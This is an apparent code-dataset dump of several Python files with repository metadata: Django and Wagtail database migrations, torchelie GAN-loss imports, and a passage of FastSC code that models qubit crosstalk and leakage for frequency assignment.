
null

0

1

0

1

0

null

0

1

0

10

d9596213d83a3f9073af7bdb56cd2616b5a63395

8,356

py

Python

api/migrations/0001_initial.py

Mateusz-Slisz/abme

82d0bac56c644a9e3d8e6d5805e9b0b293985809

[ "MIT" ]

1

2017-07-15T23:03:00.000Z

api/migrations/0001_initial.py

Mateusz-Slisz/abme

82d0bac56c644a9e3d8e6d5805e9b0b293985809

[ "MIT" ]

null

api/migrations/0001_initial.py

Mateusz-Slisz/abme

82d0bac56c644a9e3d8e6d5805e9b0b293985809

[ "MIT" ]

null

# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2018-04-22 14:53 from __future__ import unicode_literals import ckeditor.fields from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Article', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=200)), ('text', ckeditor.fields.RichTextField()), ('image', models.ImageField(default='images/none/blank_article.jpg', upload_to='images/articles/')), ('created_date', models.DateTimeField(default=django.utils.timezone.now)), ('slug', models.SlugField(blank=True)), ], ), migrations.CreateModel( name='ArticleCategory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=30)), ], ), migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=30)), ], ), migrations.CreateModel( name='Film', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=60)), ('year', models.IntegerField(choices=[(1990, 1990), (1991, 1991), (1992, 1992), (1993, 1993), (1994, 1994), (1995, 1995), (1996, 1996), (1997, 1997), (1998, 1998), (1999, 1999), (2000, 2000), (2001, 2001), (2002, 2002), (2003, 2003), (2004, 2004), (2005, 2005), (2006, 2006), (2007, 2007), (2008, 2008), (2009, 2009), (2010, 2010), (2011, 2011), (2012, 2012), (2013, 2013), (2014, 2014), (2015, 2015), (2016, 2016), (2017, 2017), (2018, 2018)])), ('image', models.ImageField(default='images/none/blank_poster.jpg', upload_to='images/films/')), ('description', models.CharField(blank=True, default='Lorem ipsum dolor sit amet,\n consectetur adipiscing elit. Etiam maximus efficitur lacus, sit amet pretium lorem \n iaculis id. Nulla hendrerit risus at justo imperdiet, eget sagittis felis consequat. \n Ut tempor luctus felis id ullamcorper. Ut fringilla pharetra magna a scelerisque.\n Maecenas nec sem varius mi rhoncus scelerisque sed sed enim. Suspendisse\n blandit ante at ipsum feugiat, vitae ultrices enim blandit.', max_length=500)), ('slug', models.SlugField(blank=True)), ], ), migrations.CreateModel( name='Filmcast', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=20)), ], ), migrations.CreateModel( name='Person', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('first_name', models.CharField(max_length=20)), ('last_name', models.CharField(max_length=20)), ('birthdate', models.DateField(blank=True, null=True)), ('biography', models.CharField(default='Lorem ipsum dolor sit amet,\n consectetur adipiscing elit. Etiam maximus efficitur lacus, sit amet pretium lorem \n iaculis id. Nulla hendrerit risus at justo imperdiet, eget sagittis felis consequat. \n Ut tempor luctus felis id ullamcorper. Ut fringilla pharetra magna a scelerisque.\n Maecenas nec sem varius mi rhoncus scelerisque sed sed enim. Suspendisse\n blandit ante at ipsum feugiat, vitae ultrices enim blandit.', max_length=500)), ('photo', models.ImageField(default='photos/none/default.png', upload_to='photos/persons/')), ('slug', models.SlugField(blank=True)), ], ), migrations.CreateModel( name='Serial', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=60)), ('year', models.IntegerField(choices=[(1990, 1990), (1991, 1991), (1992, 1992), (1993, 1993), (1994, 1994), (1995, 1995), (1996, 1996), (1997, 1997), (1998, 1998), (1999, 1999), (2000, 2000), (2001, 2001), (2002, 2002), (2003, 2003), (2004, 2004), (2005, 2005), (2006, 2006), (2007, 2007), (2008, 2008), (2009, 2009), (2010, 2010), (2011, 2011), (2012, 2012), (2013, 2013), (2014, 2014), (2015, 2015), (2016, 2016), (2017, 2017), (2018, 2018)])), ('image', models.ImageField(default='images/none/blank_poster.jpg', upload_to='images/serials/')), ('seasons', models.PositiveSmallIntegerField(default=1)), ('description', models.CharField(blank=True, default='Lorem ipsum dolor sit amet,\n consectetur adipiscing elit. Etiam maximus efficitur lacus, sit amet pretium lorem \n iaculis id. Nulla hendrerit risus at justo imperdiet, eget sagittis felis consequat. \n Ut tempor luctus felis id ullamcorper. Ut fringilla pharetra magna a scelerisque.\n Maecenas nec sem varius mi rhoncus scelerisque sed sed enim. Suspendisse\n blandit ante at ipsum feugiat, vitae ultrices enim blandit.', max_length=500)), ('slug', models.SlugField(blank=True)), ], ), migrations.CreateModel( name='Serialcast', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=20)), ('actor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Person')), ('serial', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Serial')), ], ), migrations.AddField( model_name='serial', name='actors', field=models.ManyToManyField(blank=True, related_name='serial_actors', through='api.Serialcast', to='api.Person'), ), migrations.AddField( model_name='serial', name='category', field=models.ManyToManyField(blank=True, to='api.Category'), ), migrations.AddField( model_name='serial', name='creators', field=models.ManyToManyField(blank=True, related_name='serial_creators', to='api.Person'), ), migrations.AddField( model_name='filmcast', name='actor', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Person'), ), migrations.AddField( model_name='filmcast', name='film', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Film'), ), migrations.AddField( model_name='film', name='actors', field=models.ManyToManyField(blank=True, related_name='film_actors', through='api.Filmcast', to='api.Person'), ), migrations.AddField( model_name='film', name='category', field=models.ManyToManyField(blank=True, to='api.Category'), ), migrations.AddField( model_name='film', name='directors', field=models.ManyToManyField(blank=True, related_name='film_directors', to='api.Person'), ), migrations.AddField( model_name='film', name='writers', field=models.ManyToManyField(blank=True, related_name='film_writers', to='api.Person'), ), migrations.AddField( model_name='article', name='category', field=models.ManyToManyField(blank=True, to='api.ArticleCategory'), ), ]

57.232877

527

0.602322

906

8,356

5.472406

0.208609

0.027229

0.04639

0.054457

0.830779

0.800928

0.776926

0.722872

0.654094

0

0.081994

0.255625

8,356

145

528

57.627586

0.715113

0.008138

0

0.656934

1

0.021898

0.252263

0.013036

0

1

0

false

0

0.036496

0

0.065693

0

null

0

1

0

1

0

null

0

7

8df9fccdfc8d9a55a234003248373360214fd094

1,687

py

Python

pages/migrations/0065_auto_20180426_1611.py

JoshZero87/site

c8024b805ff5ff0e16f54dce7bf05097fd2f08e0

[ "MIT" ]

4

2017-01-29T00:38:41.000Z

2019-09-04T14:30:24.000Z

pages/migrations/0065_auto_20180426_1611.py

JoshZero87/site

c8024b805ff5ff0e16f54dce7bf05097fd2f08e0

[ "MIT" ]

74

2017-10-02T04:42:54.000Z

2022-01-13T00:44:16.000Z

pages/migrations/0065_auto_20180426_1611.py

JoshZero87/site

c8024b805ff5ff0e16f54dce7bf05097fd2f08e0

[ "MIT" ]

3

2017-03-24T23:26:46.000Z

2019-10-21T01:16:03.000Z

# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2018-04-26 16:11 from __future__ import unicode_literals from django.db import migrations import wagtail.contrib.table_block.blocks import wagtail.wagtailcore.blocks import wagtail.wagtailcore.fields import wagtail.wagtailimages.blocks class Migration(migrations.Migration): dependencies = [ ('pages', '0064_auto_20180425_2110'), ] operations = [ migrations.AlterField( model_name='membernewsletterpage', name='body', field=wagtail.wagtailcore.fields.StreamField([('white_block', wagtail.wagtailcore.blocks.RichTextBlock()), ('blue_block', wagtail.wagtailcore.blocks.RichTextBlock()), ('button_block', wagtail.wagtailcore.blocks.StructBlock([('content', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), ('button_copy', wagtail.wagtailcore.blocks.CharBlock(max_length=16, required=True)), ('button_url', wagtail.wagtailcore.blocks.URLBlock(required=True)), ('button_color', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('blue', 'Blue'), ('green', 'Green'), ('red', 'Red')], max_length=16, required=False))])), ('image_block', wagtail.wagtailcore.blocks.StructBlock([('header', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('caption', wagtail.wagtailcore.blocks.RichTextBlock(required=False))])), ('table_block', wagtail.wagtailcore.blocks.StructBlock([('header', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('caption', wagtail.wagtailcore.blocks.RichTextBlock(required=False))]))]), ), ]

67.48

1,138

0.743924

180

1,687

6.855556

0.394444

0.233387

0.272285

0.209887

0.445705

0.296596

0.256078

0.155592

0

0.024246

0.095436

1,687

24

1,139

70.291667

0.784404

0.040308

0

1

0

0.128094

0.014233

0

1

0

false

0

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py

Python

torchelie/loss/gan/__init__.py

Vermeille/Torchelie

43957d83238372ae6436aac90127865c2040b76c

[ "MIT" ]

117

2019-07-14T20:39:48.000Z

2021-10-17T19:16:48.000Z

torchelie/loss/gan/__init__.py

Vermeille/Torchelie

43957d83238372ae6436aac90127865c2040b76c

[ "MIT" ]

41

2019-12-06T23:56:44.000Z

2021-08-02T09:13:30.000Z

torchelie/loss/gan/__init__.py

Vermeille/Torchelie

43957d83238372ae6436aac90127865c2040b76c

[ "MIT" ]

13

2019-09-22T00:46:54.000Z

2021-04-09T15:53:15.000Z

import torchelie.loss.gan.hinge import torchelie.loss.gan.standard import torchelie.loss.gan.penalty import torchelie.loss.gan.ls

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py

Python

fastsc/coloring/coloring.py

yongshanding/FastSC

c08bf17f30fdc5f8f2906600c632f8131745c69d

[ "MIT" ]

5

2020-08-24T19:23:28.000Z

2021-11-13T18:21:51.000Z

fastsc/coloring/coloring.py

yongshanding/FastSC

c08bf17f30fdc5f8f2906600c632f8131745c69d

[ "MIT" ]

null

fastsc/coloring/coloring.py

yongshanding/FastSC

c08bf17f30fdc5f8f2906600c632f8131745c69d

[ "MIT" ]

2

2020-10-19T16:14:45.000Z

2020-12-09T10:42:11.000Z

""" coloring.py - Functions for frequency assignment via graph coloring """ import numpy as np from qiskit import Aer, BasicAer, QuantumCircuit, QuantumRegister, execute from qiskit.extensions.standard import * from qiskit.converters import circuit_to_dag, dag_to_circuit from qiskit.transpiler import PassManager, CouplingMap from qiskit.compiler import transpile from qiskit.transpiler.passes import (BasicSwap, CXCancellation) from qiskit.quantum_info.operators import Operator #from fqc.util import get_unitary from fastsc.util import get_connectivity_graph, get_aug_line_graph, get_map_circuit, get_layer_circuits, get_nearest_neighbor_coupling_list import networkx as nx import h5py #GREEDY = 1 # Greedy algorithm parameter: distance to be considered as collision #CQQ = 0.012*2*np.pi ALPHA = -0.2 # aharmonicity - change this. EJS = 8 EJL = 20 EC = 0.3 CQQ = 0.012 sigma = 0.0 # standard deviation of the Gaussian noise # goog_uni = True # whether google_like uses uniform interaction frequency full_uni = True # whether full_coloring uses uniform interaction frequency res_coupling = 0. # strength of residual coupling (for google_like), 0~1 GATETIMES = {'unitary': 55,'rz': 30, 'z':30, 'u1': 30, 's': 30, 't': 30, 'rx': 30, 'x': 30, 'u2': 30, 'ry': 30, 'y': 30, 'u3': 30, 'h': 30, 'measure': 0.0, 'barrier': 0.0} # all in ns def compute_crosstalk(iswaps, coupling, qubit_freqs): # returns error rate based on a qubit-frequency configuration # ISWAP interaction residual_success = 1.0 Cqq = CQQ for (q1, q2) in coupling: if (q1 > 1 or q2 > 1): continue print((q1,q2)) J = 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq tau = np.pi/(2*J) epsilon_leak = (16*J**2)/(ALPHA**2+16*J**2) * np.sin(0.5*np.sqrt(ALPHA**2+16*J**2)*tau)**2 print('leakage: '+ str(epsilon_leak)) if (q1,q2) in iswaps or (q2,q1) in iswaps: print('q' + str(q1) + ': ' + str(qubit_freqs[q1]) + ', q' + str(q2) + ': ' + str(qubit_freqs[q2])) assert(qubit_freqs[q1] == qubit_freqs[q2]) # assume stay on resonant for pi/2g time # Compute leakage residual_success *= 1- epsilon_leak else: assert(qubit_freqs[q1] != qubit_freqs[q2]) #print("q%d q%d: %f,%f" % (q1, q2, qubit_freqs[q1], qubit_freqs[q2])) delta_omega = np.absolute(qubit_freqs[q1] - qubit_freqs[q2]) residual_coupling = J**2 / (delta_omega * 4 * np.pi) #print("here") #print(J) #print(residual_coupling) residual_success *= 1- epsilon_leak tau = np.pi/(2 * 0.5 * np.sqrt(max(qubit_freqs[q1], qubit_freqs[q2])**2) * Cqq) residual_success *= 1 - np.sin(residual_coupling * tau)**2 #print(residual_success) return 1 - residual_success def swap_channel_google(coupling, active, qubit_freqs, taus): # print("inside swap_channel_google") # print("active tiling:", active) Cqq = CQQ res = [] for (i, (q1,q2)) in enumerate(coupling): J = 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq delta_omega = np.absolute(qubit_freqs[q1] - qubit_freqs[q2]) if delta_omega == 0: residual_coupling = J else: residual_coupling = J**2 / (delta_omega * 4 * np.pi) tau = taus[i] if (q1,q2) in active or (q2,q1) in active: res.append(np.sin(residual_coupling * tau)**2) else: res.append(res_coupling*np.sin(residual_coupling * tau)**2) # print("couplings:",coupling) # print("swap chances:",res) return res def swap_channel(coupling, qubit_freqs, taus): # return prob of rabi oscillation between 01 and 10 (i.e. iswap) # for each pair of coupled qubits # taus is list of hold durations: max swap happens at 2pi/g Cqq = CQQ res = [] for (i, (q1,q2)) in enumerate(coupling): J = 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq delta_omega = np.absolute(qubit_freqs[q1] - qubit_freqs[q2]) if delta_omega == 0: residual_coupling = J else: residual_coupling = J**2 / (delta_omega * 4 * np.pi) tau = taus[i] res.append(np.sin(residual_coupling * tau)**2) return res def leak_channel_google(coupling, active, qubit_freqs, alphas, taus): # print("inside leak_channel_google") # print("active tiling:", active) Cqq = CQQ res = [] for (i, (q1,q2)) in enumerate(coupling): # 02 f1 = qubit_freqs[q1] f2 = qubit_freqs[q2] + alphas[q2] J = 0.5 * np.sqrt(f1 * f2) * Cqq delta_omega = np.absolute(f1 - f2) if delta_omega == 0: residual_coupling = np.sqrt(2) * J else: residual_coupling = (np.sqrt(2)*J)**2 / (delta_omega * 4 * np.pi) tau = taus[i] epsilon_leak02 = np.sin(residual_coupling * tau)**2 ## 20 #f1 = qubit_freqs[q1] + alphas[q2] #f2 = qubit_freqs[q2] #J = 0.5 * np.sqrt(f1 * f2) * Cqq #delta_omega = np.absolute(f1 - f2) #if delta_omega == 0: # residual_coupling = np.sqrt(2) * J #else: # residual_coupling = (np.sqrt(2)*J)**2 / (delta_omega * 4 * np.pi) #tau = taus[i] #epsilon_leak20 = np.sin(residual_coupling * tau)**2 #res.append((epsilon_leak02 + epsilon_leak20) / 2) if (q1,q2) in active or (q2,q1) in active: res.append(epsilon_leak02) else: res.append(epsilon_leak02*res_coupling) #print("leak chances:",res) return res def leak_channel(coupling, qubit_freqs, alphas, taus): # return prob of rabi oscillation between 11 and (20+02)/sqrt(2) (i.e. leakage) # for each pair of coupled qubits # taus is list of hold durations Cqq = CQQ res = [] for (i, (q1,q2)) in enumerate(coupling): # 02 f1 = qubit_freqs[q1] f2 = qubit_freqs[q2] + alphas[q2] J = 0.5 * np.sqrt(f1 * f2) * Cqq delta_omega = np.absolute(f1 - f2) if delta_omega == 0: residual_coupling = np.sqrt(2) * J else: residual_coupling = (np.sqrt(2)*J)**2 / (delta_omega * 4 * np.pi) tau = taus[i] epsilon_leak02 = np.sin(residual_coupling * tau)**2 ## 20 #f1 = qubit_freqs[q1] + alphas[q2] #f2 = qubit_freqs[q2] #J = 0.5 * np.sqrt(f1 * f2) * Cqq #delta_omega = np.absolute(f1 - f2) #if delta_omega == 0: # residual_coupling = np.sqrt(2) * J #else: # residual_coupling = (np.sqrt(2)*J)**2 / (delta_omega * 4 * np.pi) #tau = taus[i] #epsilon_leak20 = np.sin(residual_coupling * tau)**2 #res.append((epsilon_leak02 + epsilon_leak20) / 2) res.append(epsilon_leak02) return res def compute_crosstalk_iswaps(iswaps, coupling, qubit_freqs, taus, gt): # returns error rate of simultaneous iswaps success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ # one complete swap: tau = pi/2g all_taus = [] for (q1,q2) in coupling: if (q1,q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) #taus.append(c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) #taus = [np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2])) * Cqq for (q1,q2) in coupling] #taus = [tau * tau_special[(q1,q2)] if (q1,q2) in tau_special or (q2,q1) in tau_special else tau for (i,tau) in taus] prob_swap = swap_channel(coupling, qubit_freqs, all_taus) alphas = [ALPHA for f in qubit_freqs] #TODO prob_leak = leak_channel(coupling, qubit_freqs, alphas, all_taus) #print("swap: ", prob_swap) #print("leak: ", prob_leak) for (i, (q1,q2)) in enumerate(coupling): if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] ## sqrt iswap #elif ((q1,q2) in tau_special) or ((q2,q1) in tau_special): # print("sqrt iswap 0.5-prob_swap ",abs(0.5 - prob_swap[i])) # success *= 1 - abs(0.5 - prob_swap[i]) # swap_success *= 1 - abs(0.5 - prob_swap[i]) ## iswap #else: # #print("2nd loop:") # print("iswap prob_swap ",prob_swap[i]) # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("taus[i]:",taus[i]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("j", 0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq) # success *= prob_swap[i] # swap_success *= prob_swap[i] # print("iswap success ",success) # print("iswap swap_success ",swap_success) success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def compute_crosstalk_cphase(iswaps, coupling, qubit_freqs, taus, gt): # returns error rate of simultaneous cphases success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ all_taus = [] alphas = [ALPHA for f in qubit_freqs] #TODO for (q1,q2) in coupling: if (q1, q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) # c = 1.0 # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2]+alphas[q2] #elif (q1,q2) in tau_special: # c = tau_special[(q1,q2)] # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #elif (q2,q1) in tau_special: # c = tau_special[(q2,q1)] # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #else: # c = 1.0 # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #taus.append(c * np.pi/(np.sqrt(2) * 0.5 * np.sqrt(f1 * f2) * Cqq)) # one complete swap and back: tau = 2 * (pi/(2*sqrt(2)*g) = pi/sqrt(2)g #taus = [np.pi/(np.sqrt(2) * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2])) * Cqq for (q1,q2) in coupling] #taus = [tau * tau_special[(q1,q2)] if (q1,q2) in tau_special or (q2,q1) in tau_special else tau for tau in taus] prob_swap = swap_channel(coupling, qubit_freqs, all_taus) prob_leak = leak_channel(coupling, qubit_freqs, alphas, all_taus) #print("swap: ", prob_swap) #print("leak: ", prob_leak) for (i, (q1,q2)) in enumerate(coupling): if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def compute_crosstalk_flexible(cphases, iswaps, coupling, qubit_freqs, taus, gt): success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ all_taus = [] alphas = [ALPHA for f in qubit_freqs] for (q1,q2) in coupling: if (q1,q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) #if (q1,q2) in iswaps or (q2,q1) in iswaps: # taus.append(c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) # #print("1st loop:") # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("c:",c) # #print("tau from 1st loop:",c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) #else: # taus.append(c * np.pi/(np.sqrt(2) * 0.5 * np.sqrt(qubit_freqs[q1] * (qubit_freqs[q2]+alphas[q2]))* Cqq)) prob_swap = swap_channel(coupling, qubit_freqs, all_taus) prob_leak = leak_channel(coupling, qubit_freqs, alphas, all_taus) for (i, (q1,q2)) in enumerate(coupling): # cphase if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] ## sqrt iswap #elif ((q1,q2) in tau_special) or ((q2,q1) in tau_special): # print("sqrt iswap 0.5-prob_swap ",abs(0.5 - prob_swap[i])) # success *= 1 - abs(0.5 - prob_swap[i]) # swap_success *= 1 - abs(0.5 - prob_swap[i]) ## iswap #else: # #print("2nd loop:") # print("iswap prob_swap ",prob_swap[i]) # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("taus[i]:",taus[i]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("j", 0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq) # success *= prob_swap[i] # swap_success *= prob_swap[i] # print("iswap success ",success) # print("iswap swap_success ",swap_success) success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def compute_crosstalk_iswaps_gmon(iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx): # returns error rate of simultaneous iswaps if len(iswaps)==0: active = [] else: active = tilings[tiling_idx] success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ # one complete swap: tau = pi/2g all_taus = [] for (q1,q2) in coupling: if (q1,q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) #taus.append(c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) #taus = [np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2])) * Cqq for (q1,q2) in coupling] #taus = [tau * tau_special[(q1,q2)] if (q1,q2) in tau_special or (q2,q1) in tau_special else tau for (i,tau) in taus] prob_swap = swap_channel_google(coupling, active, qubit_freqs, all_taus) alphas = [ALPHA for f in qubit_freqs] #TODO prob_leak = leak_channel_google(coupling, active, qubit_freqs, alphas, all_taus) #print("swap: ", prob_swap) #print("leak: ", prob_leak) for (i, (q1,q2)) in enumerate(coupling): if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] ## sqrt iswap #elif ((q1,q2) in tau_special) or ((q2,q1) in tau_special): # print("sqrt iswap 0.5-prob_swap ",abs(0.5 - prob_swap[i])) # success *= 1 - abs(0.5 - prob_swap[i]) # swap_success *= 1 - abs(0.5 - prob_swap[i]) ## iswap #else: # #print("2nd loop:") # print("iswap prob_swap ",prob_swap[i]) # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("taus[i]:",taus[i]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("j", 0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq) # success *= prob_swap[i] # swap_success *= prob_swap[i] # print("iswap success ",success) # print("iswap swap_success ",swap_success) success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def compute_crosstalk_cphase_gmon(iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx): # returns error rate of simultaneous cphases if len(cphases)==0: active = [] else: active = tilings[tiling_idx] success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ all_taus = [] alphas = [ALPHA for f in qubit_freqs] #TODO for (q1,q2) in coupling: if (q1, q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) # c = 1.0 # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2]+alphas[q2] #elif (q1,q2) in tau_special: # c = tau_special[(q1,q2)] # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #elif (q2,q1) in tau_special: # c = tau_special[(q2,q1)] # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #else: # c = 1.0 # f1 = qubit_freqs[q1] # f2 = qubit_freqs[q2] #taus.append(c * np.pi/(np.sqrt(2) * 0.5 * np.sqrt(f1 * f2) * Cqq)) # one complete swap and back: tau = 2 * (pi/(2*sqrt(2)*g) = pi/sqrt(2)g #taus = [np.pi/(np.sqrt(2) * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2])) * Cqq for (q1,q2) in coupling] #taus = [tau * tau_special[(q1,q2)] if (q1,q2) in tau_special or (q2,q1) in tau_special else tau for tau in taus] prob_swap = swap_channel_google(coupling, active, qubit_freqs, all_taus) prob_leak = leak_channel_google(coupling, active, qubit_freqs, alphas, all_taus) #print("swap: ", prob_swap) #print("leak: ", prob_leak) for (i, (q1,q2)) in enumerate(coupling): if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def compute_crosstalk_flexible_gmon(cphases, iswaps, coupling, qubit_freqs, taus, gt, tilings, tiling_idx): if len(cphases)==0 and len(iswaps)==0: active = [] else: active = tilings[tiling_idx] success = 1.0 swap_success = 1.0 leak_success = 1.0 Cqq = CQQ all_taus = [] alphas = [ALPHA for f in qubit_freqs] for (q1,q2) in coupling: if (q1,q2) in taus: all_taus.append(taus[(q1,q2)]) else: all_taus.append(gt) #if (q1,q2) in iswaps or (q2,q1) in iswaps: # taus.append(c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) # #print("1st loop:") # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("c:",c) # #print("tau from 1st loop:",c * np.pi/(2 * 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq)) #else: # taus.append(c * np.pi/(np.sqrt(2) * 0.5 * np.sqrt(qubit_freqs[q1] * (qubit_freqs[q2]+alphas[q2]))* Cqq)) prob_swap = swap_channel_google(coupling, active, qubit_freqs, all_taus) prob_leak = leak_channel_google(coupling, active, qubit_freqs, alphas, all_taus) for (i, (q1,q2)) in enumerate(coupling): # cphase if not((q1,q2) in iswaps or (q2,q1) in iswaps): success *= 1 - prob_swap[i] swap_success *= 1 - prob_swap[i] ## sqrt iswap #elif ((q1,q2) in tau_special) or ((q2,q1) in tau_special): # print("sqrt iswap 0.5-prob_swap ",abs(0.5 - prob_swap[i])) # success *= 1 - abs(0.5 - prob_swap[i]) # swap_success *= 1 - abs(0.5 - prob_swap[i]) ## iswap #else: # #print("2nd loop:") # print("iswap prob_swap ",prob_swap[i]) # #print("qubit freq 1",qubit_freqs[q1]) # #print("qubit freq 2",qubit_freqs[q2]) # #print("taus[i]:",taus[i]) # #print("g",np.pi/(2*0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq)) # #print("j", 0.5*np.sqrt(qubit_freqs[q1]*qubit_freqs[q2])*Cqq) # success *= prob_swap[i] # swap_success *= prob_swap[i] # print("iswap success ",success) # print("iswap swap_success ",swap_success) success *= 1 - prob_leak[i] leak_success *= 1 - prob_leak[i] return 1 - success, 1-swap_success, 1-leak_success def get_flux_noise(omega, delta): # Return the deviation of frequency due to gaussian noise in flux # omega is the target frequency, delta is the std dev. Ejs = EJS Ejl = EJL Ec = EC gamma1 = Ejl/Ejs d1 = (gamma1 - 1)/(gamma1 + 1) flux_est = np.arccos((omega-3.75)/1.25)/(2*np.pi) flux_new = flux_est + np.random.normal(0,delta) def _Em(phi, m): # Asymmetric transmon return -(Ejs + Ejl)/2 + np.sqrt(4*(Ejs + Ejl)*Ec*np.sqrt(np.cos(np.pi*phi)**2 + d1**2*np.sin(np.pi*phi)**2))*(m + 1/2) - Ec*(6*m**2 + 6*m + 3)/12 omega_old = _Em(flux_est, 1) - _Em(flux_est, 0) omega_new = _Em(flux_new, 1) - _Em(flux_new, 0) if omega_new > 5.0: omega_new = 5.0 elif omega_new < 2.5: omega_new = 2.5 return omega_new - omega_old def greedy_reschedule(coupling, edges): #print("=== coupling ===") #print(coupling) #print("--- edges ---") #print(edges) #print("===") newedges = [] leftover = [] # Priority based on order in the edges list ind = [False for _ in range(len(edges))] for (i, (u,v)) in enumerate(edges): 